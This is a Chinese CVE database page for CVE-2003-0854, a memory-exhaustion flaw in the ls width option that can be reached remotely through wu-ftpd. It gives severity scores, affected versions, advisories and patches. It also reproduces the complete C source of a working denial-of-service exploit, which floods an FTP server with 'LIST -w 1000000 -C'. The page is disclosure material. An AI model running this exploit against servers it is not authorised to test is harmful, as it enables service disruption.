CVE-2003-0854
CVSS2.1
发布时间 :2003-11-17 00:00:00
修订时间 :2008-09-10 15:20:44
NMCOE    

[原文]ls in the fileutils or coreutils packages allows local users to consume a large amount of memory via a large -w value, which can be remotely exploited via applications that use ls, such as wu-ftpd.


[CNNVD]Coreutils ls程序宽度参数整数溢出漏洞(CNNVD-200311-050)

        
        Coreutils 'ls'是一款用户显示文件和目录信息的工具。
        Coreutils 'ls'在处理宽度和列显示命令行参数时缺少正确的边界检查,本地或者远程攻击者可以利用这个漏洞进行整数溢出攻击,可导致应用程序崩溃。
        提交超长的参数"-w X -C"(X为任意超大值)给Coreutils 'ls'程序,会分配一块很大的内存,出现整数溢出问题,远程应用程序允许用户调用这个'ls'并没有提供参数过滤,就可能导致应用程序崩溃,如Wu-ftpd FTP服务程序存在此问题。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15
cpe:/a:washington_university:wu-ftpd:2.4.2_vr16
cpe:/a:washington_university:wu-ftpd:2.4.2_vr17
cpe:/a:washington_university:wu-ftpd:2.4.2_beta2::academ
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7
cpe:/a:washington_university:wu-ftpd:2.4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13
cpe:/a:gnu:fileutils:4.0GNU Fileutils 4.0
cpe:/a:gnu:fileutils:4.1GNU Fileutils 4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5
cpe:/a:washington_university:wu-ftpd:2.6.1
cpe:/a:washington_university:wu-ftpd:2.6.0
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11
cpe:/a:gnu:fileutils:4.0.36GNU Fileutils 4.0.36
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18::academ
cpe:/a:washington_university:wu-ftpd:2.5.0
cpe:/a:gnu:fileutils:4.1.6GNU Fileutils 4.1.6
cpe:/a:gnu:fileutils:4.1.7GNU Fileutils 4.1.7
cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0854
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0854
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-050
(官方数据源) CNNVD

- 其它链接及资源

http://www.turbolinux.com/security/TLSA-2003-60.txt
(UNKNOWN)  TURBO  TLSA-2003-60
http://www.securityfocus.com/advisories/6014
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-026-01
http://www.redhat.com/support/errata/RHSA-2003-310.html
(UNKNOWN)  REDHAT  RHSA-2003:310
http://www.redhat.com/support/errata/RHSA-2003-309.html
(UNKNOWN)  REDHAT  RHSA-2003:309
http://www.guninski.com/binls.html
(UNKNOWN)  MISC  http://www.guninski.com/binls.html
http://www.debian.org/security/2005/dsa-705
(UNKNOWN)  DEBIAN  DSA-705
http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
http://secunia.com/advisories/17069
(VENDOR_ADVISORY)  SECUNIA  17069
http://secunia.com/advisories/10126
(VENDOR_ADVISORY)  SECUNIA  10126
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012548.html
(UNKNOWN)  FULLDISC  20031022 Fun with /bin/ls, yet still ls better than windows
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771
(UNKNOWN)  CONECTIVA  CLA-2003:771
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000768
(UNKNOWN)  CONECTIVA  CLA-2003:768
http://www.milw0rm.com/exploits/115
(UNKNOWN)  MILW0RM  115
http://www.mandriva.com/security/advisories?name=MDKSA-2003:106
(UNKNOWN)  MANDRAKE  MDKSA-2003:106

- 漏洞信息

Coreutils ls程序宽度参数整数溢出漏洞
低危 边界条件错误
2003-11-17 00:00:00 2006-09-20 00:00:00
远程  
        
        Coreutils 'ls'是一款用户显示文件和目录信息的工具。
        Coreutils 'ls'在处理宽度和列显示命令行参数时缺少正确的边界检查,本地或者远程攻击者可以利用这个漏洞进行整数溢出攻击,可导致应用程序崩溃。
        提交超长的参数"-w X -C"(X为任意超大值)给Coreutils 'ls'程序,会分配一块很大的内存,出现整数溢出问题,远程应用程序允许用户调用这个'ls'并没有提供参数过滤,就可能导致应用程序崩溃,如Wu-ftpd FTP服务程序存在此问题。
        

- 公告与补丁

        厂商补丁:
        Conectiva
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fileutils-4.0-20U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fileutils-4.0-20U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/fileutils-4.1-3U80_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/fileutils-4.1-3U80_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/9/RPMS/fileutils-4.1-7779U90_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/9/SRPMS/fileutils-4.1-7779U90_1cl.src.rpm
        GNU
        ---
        CVS Tree已经修正这个漏洞:
        
        http://mail.gnu.org/archive/html/bug-coreutils/2003-10/msg00070.html

- 漏洞信息 (115)

wu-ftpd 2.6.2 Remote Denial Of Service Exploit (wuftpd-freezer.c) (EDBID:115)
linux dos
2003-10-31 Verified
0 Angelo Rosiello
N/A [点击下载]
/*
*     (c) Rosiello Security
*
* Copyright Rosiello Security 2003
*   All Rights reserved.
*
* Tested on Red Hat 9.0
*
* Author: Angelo Rosiello
* Mail  : angelo rosiello org
* This software is only for educational purpose.
* Do not use it against machines different from yours.
* Respect law.
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

void addr_initialize( );
void usage( );

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	char user[30], password[30], ch;
	struct sockaddr_in server_addr;

        fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
        fprintf( stdout, "http://www.rosiello.org\n" );
        fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

	if( argc != 6 ) usage( argv[0] );

	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %s\n", argv[3] );
	sprintf( password, "PASS %s\n", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

  	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	ch = '\0';

	printf( "Connection executed, now waiting to log in...\n" );

	printf( "%s", user );

	send( sd, user, strlen( user ), 0 );
	while ( ch != '\n' )
	{
		recv( sd, &ch, 1, 0);
		printf("%c", ch );
	}
	printf( "%s", password );

	ch = '\0';

 	send( sd, password, strlen( password ), 0 );
        while ( ch != '\n' )
        {
                recv( sd, &ch, 1, 0);
                printf("%c", ch );
        }

	printf( "Sending the DoS query\n" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -C\n", 19 );
	}
	printf( "All done\n" );
	close( sd );
	return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
     	address -> sin_family = AF_INET;
     	address -> sin_port = htons((u_short)port);
     	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
  	exit(0);
}


// milw0rm.com [2003-10-31]
		

- 漏洞信息

4620
GNU coreutils / fileutils ls -w Argument WU-FTPD Memory Consumption DoS
Local / Remote Denial of Service
Loss of Availability Upgrade
PoC Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

GNU coreutils and fileutils contain a flaw in the 'ls' command that may allow a remote denial of service as e.g. demonstrated via wu-ftpd. The issue is triggered when handling overly large values supplied as arguments to the '-w' command line parameter. With a specially crafted command, a remote attacker can cause the application to consume a large amount of memory resources.

- 时间线

2003-10-22 Unknow
Unknow 2003-12-22

- 解决方案

It has been reported that this issue has been fixed. Upgrade to version 5.1.0, or higher, to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站